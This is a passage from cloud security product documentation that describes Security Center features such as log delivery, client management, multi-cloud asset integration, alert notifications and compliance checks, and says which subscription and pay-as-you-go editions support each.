    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers. Antivirus: Only supports Agent Protection and Client Resource Management (Low Consumption Mode and Smooth Mode). Host Protection and Host and Container Protection: All features.

• Feature Settings > Settings > Other Configuration

  • Feature description:

    • Data Delivery of ActionTrail: Uses the service-linked role of Security Center to ship ActionTrail data to the Security Center Logstore. Use this data for threat detection and alert analysis, such as abnormal AccessKey calls, abnormal RAM account logons, and high-risk command execution.

    • Global Log Filter: Filters and deduplicates client logs before reporting them, reducing log storage costs while maintaining security effectiveness. This improves the efficiency of log security operations.

  • Edition support:

    Billing model	Support details
    Subscription	Anti-virus, Advanced, Enterprise, and Ultimate: Requires the purchase of the Log Analysis value-added service. All editions support Data Delivery of ActionTrail by default. After purchasing the Log Analysis value-added service, Global Log Filter is supported. Note For information about the specific log types supported by different editions, see Log types and field descriptions.
    Pay-as-you-go	Enable any feature to support Data Delivery of ActionTrail.

    Service model	Feature support details
    Subscription
    Pay-as-you-go	Enable the pay-as-you-go service for Host and Container Security, and bind a protection level to your servers. Antivirus: Only supports Agent Protection and Client Resource Management. Host Protection and Host and Container Protection: All features.

• Feature Settings - Client

  • Feature description: Centrally view servers without a security client, obtain security commands, and access the client uninstallation entry. It also provides support for the agent integration client solution.

  • Edition support: Supported by default in all editions.

• Feature Settings - Multi-cloud Configuration Management

  • Feature description:

    • Multi-cloud Asset Integration: Supports integrating non-Alibaba Cloud servers (including third-party cloud servers and IDC servers) into Security Center for protection and management.

    • Integrate IDC Assets: Create an IDC probe to detect and discover IDC server assets. Then, synchronize the discovered IDC servers to the Security Center Asset Center module for unified management.

    • Asset Management Rules: Set conditions for different asset management rules to group or tag servers that meet the same conditions. This helps improve asset management efficiency.

  • Edition support: Supported by default in all editions.

• Notification Settings

  • Feature description: Configure alert policies for various security events, such as security alerts, vulnerability intelligence, and baseline risks. Receive notifications through the following methods:

    • Text Message/Email/Internal Message

    • DingTalk Chatbot

    • Cloud Monitor Push

  • Edition support:

    Service model	Feature support details
    Subscription	Anti-virus: Text Message/Email/Internal Message and Cloud Monitor Push Advanced, Enterprise, and Ultimate: All features.
    Pay-as-you-go	Enable any pay-as-you-go service.

• Multi-account Security Management

  • Feature description: Supports unified management of asset security across multiple member accounts within an enterprise. This helps you promptly obtain security risk information for all member accounts in your enterprise.

  • Edition support: Supported by default in all editions.

• Compliance Check

  • Feature description:

    • Security Compliance Check: Provides classified protection compliance check features covering communication networks, regional boundaries, computing environments, and management centers. It also provides classified protection compliance check reports.

    • ISO 27001 Compliance Check: Checks whether your system complies with ISO 27001 certification requirements, such as asset management, access control, cryptography, and operational security. This helps you achieve ISO 27001 certification.

  • Edition support: Supported by default in all editions.